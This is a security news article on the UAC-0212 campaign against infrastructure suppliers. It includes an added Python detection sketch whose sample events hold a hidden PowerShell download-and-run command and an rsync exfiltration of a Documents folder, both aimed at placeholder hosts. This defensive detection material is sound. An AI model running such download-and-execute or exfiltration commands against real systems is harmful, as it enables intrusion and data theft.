Thursday, May 8, 2025

UAC-0212: Hackers Unleash Devastating Cyber Attack on Critical Infrastructure


In a recent escalation of cyber threats, hackers have launched a targeted campaign, identified as UAC-0212, aimed at compromising critical infrastructure facilities in Ukraine.

This campaign, which began in the second half of 2024, involves sophisticated tactics to infiltrate the networks of developers and suppliers of automation and process control solutions.

The attackers’ ultimate goal is to disrupt the information and communication systems (ICS) of enterprises in vital sectors such as energy, water, and heat supply.


UAC-0212: Hackers Unleash Devastating Cyber Assault on Critical Infrastructure

The UAC-0212 campaign is notable for its use of novel techniques, including the distribution of PDF documents containing malicious links.

These links exploit the CVE-2024-38213 vulnerability, leading to the download of an LNK file.

[Figure: UAC-0212, example of the attack chain]

Once executed, this file triggers a PowerShell command that displays a decoy document while secretly downloading and installing malicious EXE/DLL files.

Tools like SECONDBEST, EMPIREPAST, SPARK, and CROOKBAG have been identified as part of this operation.

Additionally, RSYNC is used for long-term document theft, highlighting the attackers’ intent to gather sensitive information.
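The following Python detection sketch is an added illustration, not code from the article or from CERT-UA. It scans constructed process-creation events for the two stages described above: PowerShell launched from a user-opened LNK (a child of explorer.exe) that shows a decoy document while downloading EXE/DLL payloads, and rsync pushing a documents folder to a remote host. The event records, hostnames, paths and the EXAMPLE-PLACEHOLDER addresses are constructed assumptions.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# Hostnames, paths and the EXAMPLE-PLACEHOLDER addresses are illustrative only.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"Start-Process .\\offer.pdf; "
                "Invoke-WebRequest http://EXAMPLE-PLACEHOLDER/u.dll -OutFile $env:TEMP\\u.dll; "
                "rundll32 $env:TEMP\\u.dll,Run\""},
    {"host": "ws-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Tools\rsync\rsync.exe",
     "cmdline": "rsync.exe -az C:/Users/olga/Documents/ user@EXAMPLE-PLACEHOLDER:/in/"},
    {"host": "ws-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]

# Indicators of the LNK -> PowerShell -> decoy + EXE/DLL download stage.
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-enc\b|-e\b", re.I)
DECOY_RE = re.compile(r"start-process\s+\S+\.(pdf|docx?|xlsx?)", re.I)
PAYLOAD_RE = re.compile(r"rundll32|regsvr32|\.exe\b|\.dll\b", re.I)
# rsync pushing to user@host:path from a workstation fits the document theft stage.
RSYNC_REMOTE_RE = re.compile(r"\S+@\S+:")


def classify(event):
    """Return the names of all rules that match one process-creation event."""
    hits = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    # A double-clicked LNK runs its command line as a child of explorer.exe.
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe"):
        if DOWNLOAD_RE.search(cmd) and (HIDDEN_RE.search(cmd) or DECOY_RE.search(cmd)):
            hits.append("lnk_powershell_downloader")
        if DECOY_RE.search(cmd) and PAYLOAD_RE.search(cmd):
            hits.append("decoy_then_payload")
    if image.endswith("rsync.exe") and RSYNC_REMOTE_RE.search(cmd):
        hits.append("rsync_to_remote_host")
    return hits


def scan(events):
    """Return (host, rule) pairs for every event that matches at least one rule."""
    return [(e["host"], rule) for e in events for rule in classify(e)]
```

Run `scan(SAMPLE_EVENTS)` to see which constructed events trip which rule; the legitimate backup script on ws-02 produces no hit.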

The geography of the attack is extensive, with targets including companies from Serbia, the Czech Republic, and Ukraine.

Between July 2024 and February 2025, multiple logistics and equipment manufacturing companies were compromised.

The attackers often pose as potential customers, engaging in correspondence with victims over several days to gain trust before sending malicious documents.

Once inside, the attackers move quickly through the network, establishing persistence on servers and workstations within hours of the initial compromise.

Impact and Response

The UAC-0212 campaign underscores the increasing threat to critical infrastructure worldwide.

Given the attackers’ ability to rapidly spread through networks, simply identifying and reinstalling affected systems is insufficient.

CERT-UA urges supplier companies to contact them for comprehensive technical investigations and incident response measures.

The agency provides cyber threat indicators and encourages vigilance among enterprises that may have been targeted.

As the threat landscape evolves, it is crucial for organizations to enhance their cybersecurity posture, particularly those involved in critical infrastructure.

The use of advanced threat detection tools and regular network audits can help mitigate such attacks.

The ongoing nature of these cyber operations highlights the need for continuous monitoring and collaboration between cybersecurity entities to counter emerging threats effectively.


Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
